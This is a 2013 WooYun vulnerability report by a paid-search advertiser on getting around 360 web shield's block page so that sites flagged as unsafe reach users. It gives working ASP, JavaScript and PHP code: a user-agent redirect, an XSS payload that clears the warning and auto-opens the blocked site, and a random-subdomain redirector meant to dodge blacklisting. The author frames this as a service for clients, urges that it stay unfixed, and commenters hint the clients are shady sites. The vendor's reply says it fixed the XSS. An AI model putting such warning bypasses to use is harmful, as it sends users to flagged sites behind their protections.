当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028163

漏洞标题:我是如何利用xss绕过360网盾做防360拦截空间的

相关厂商:奇虎360

漏洞作者: z7y

提交时间:2013-07-08 14:02

修复时间:2013-08-22 14:02

公开时间:2013-08-22 14:02

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-08: 细节已通知厂商并且等待厂商处理中
2013-07-08: 厂商已经确认,细节仅向厂商公开
2013-07-18: 细节向核心白帽子及相关领域专家公开
2013-07-28: 细节向普通白帽子公开
2013-08-07: 细节向实习白帽子公开
2013-08-22: 细节向公众公开

简要描述:

本人做百度竞价推广,经常有客户网站被360拦截了,让我想想办法...屌丝只好从命,琢磨一番360网盾了~ 几个页面+服务器安全狗+两个空间,就可以实现此功能!(现已修复其一)
【我这方法是针对百度推广竞价的客户而成,排名那些网站应该无效,但是百度竞价可以】

详细说明:

<%
Dim ua 
ua = Request.ServerVariables("HTTP_USER_AGENT")
If (Instr(ua, "Windows NT 5.1") = 0 or Instr(ua, "Windows NT 6.1") = 0)  and Instr(ua, "MSIE")>0 Then '除了 xp win7 以外的系统
Response.Redirect("index1.asp")
else
Response.Redirect("index2.asp")
End IF
%>


index1.asp内容:

<%
 dim url
 y=""""
url = "http://www.已被拦截域名.com/?<img/onerror="& y &"document.title='';document.getElementById('safemon').action='http://www.已被拦截域名.com/?';document.getElementsByTagName('div')[0].innerHTML='';forceOpenUrl();"& y &"src=0>"  
response.redirect url
%>
这里目的可以看下拦截页面源码
//忽略警告,继续访问
function forceOpenUrl() { 
	if(warn_from=='se6'){
        external.AppCmd(external.GetSID(window),"sesafe","safebrowsing_openurl", ucode,"", function(i1,s1){})
        location.href = jump;                                      
        return;    
    }else{
    	document.getElementById("safemon").submit();
	}
}
 
function closeWindow(){
    window.opener=null; 
    window.open('','_self'); 
    window.close(); 
}


index2.asp内容:

<script type="text/javascript">
var str=window.location.href;
str=str.split("&@;mk");
if(str[1]!=""){
window.location.href="z7y.php?p="+str[1];
}
</script>


z7y.php内容:

<?php
function randomkeys($length)
{
 $pattern='1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLOMNOPQRSTUVWXYZ';
 for($i=0;$i<$length;$i++)
 {
   $key .= $pattern{mt_rand(0,35)};    //php随机数
 }
 return $key;
}
header('HTTP/1.1 404');
ob_start();
phpinfo();
$url="http://".randomkeys(5).".xxxx.info/";
 $list1=$_GET["/l?"]; 
 $rurl=$url.$list1."";
header("location: $rurl");
ob_end_clean();
?>


一个星期前360尚未修复index1.asp内容所实现功能
修复后:

3.jpg


算是一个XSS把..能弹窗什么的,甚至能把【这是一个不安全的网站】变成【这是一个可信的网站】,而且无需任何操作自动跳过这个提示不安全网站的框框~
index2.asp是一个泛域名脚本,此方法依然有效. 一个www域名主页放一个图片什么的,毫无敏感词的index.asp主页,然后就自动跳转到 5随机数.xxx.info 域名,这样360除非人工拉域名进黑名单,否则一直都是二级域名被拦截,但是一直是5位随机数,拦截都无所谓~~
至于还有一些新防拦截方法,下期再公布...总之 对360网盾有很多逻辑问题,各种奇淫技巧可以绕过拦截。

漏洞证明:

一个星期前360尚未修复index1.asp内容所实现功能
修复后:

3.jpg

修复方案:

最好就不修复了- 0 -.....

版权声明:转载请注明来源 z7y@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-07-08 19:49

厂商回复:

感谢反馈。这是网盾在处理未经浏览器编码的URL时导致的XSS,主要影响IE浏览器。我们已紧急修复。
对于域名泛解析问题,网盾拦截以黑优先,域名泛解析不会影响拦截效果。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-07-08 14:07 | 小囧 ( 普通白帽子 | Rank:396 漏洞数:62 | 在通往牛B的路上一路狂奔)

    碉堡了

  2. 2013-07-08 14:10 | 小森森 ( 路人 | Rank:11 漏洞数:2 | 不中二 枉少年)

    dbl

  3. 2013-07-08 14:12 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  4. 2013-07-08 14:16 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    @VIP 屌丝为何苦苦不上Q~ 寡人想念爱妃了!

  5. 2013-07-08 14:20 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    红衣自己的竞价亏了要找洞主。

  6. 2013-07-08 14:40 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)

    mark

  7. 2013-07-08 14:47 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    @无敌L.t.H 红衣??

  8. 2013-07-08 15:50 | 基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)

    红衣 又要说 又是某卖假药网站的恶意抹黑//

  9. 2013-07-08 18:24 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    这是不过日子了么..

  10. 2013-07-08 18:28 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    TAT @啤酒 亲,我知道你会养我的!

  11. 2013-07-08 19:59 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    坑爹啊。。。。5Rank - 0 -,好把....泛解析真的不会么? @奇虎360 呵呵!

  12. 2013-07-08 20:34 | 帅气凌云 ( 普通白帽子 | Rank:314 漏洞数:60 | 弱点扫描{Www.VulScan.CN} 为网站健康检查...)

    Z基想做死?

  13. 2013-07-08 23:40 | z7y ( 实习白帽子 | Rank:57 漏洞数:9 | 关注技术与网络安全)

    @帅气凌云 何方妖基?竟敢作死?

  14. 2013-08-09 11:19 | sky ( 实习白帽子 | Rank:94 漏洞数:33 | 有一天,我带着儿子@jeary 去@园长 的园长...)

    贱人就是矫情!

  15. 2013-08-11 13:03 | 9k九块钱 ( 路人 | Rank:8 漏洞数:11 | ส็็็็็็็็็็็็็็็็็็็...)

    支持楼主啊 我们也做竞价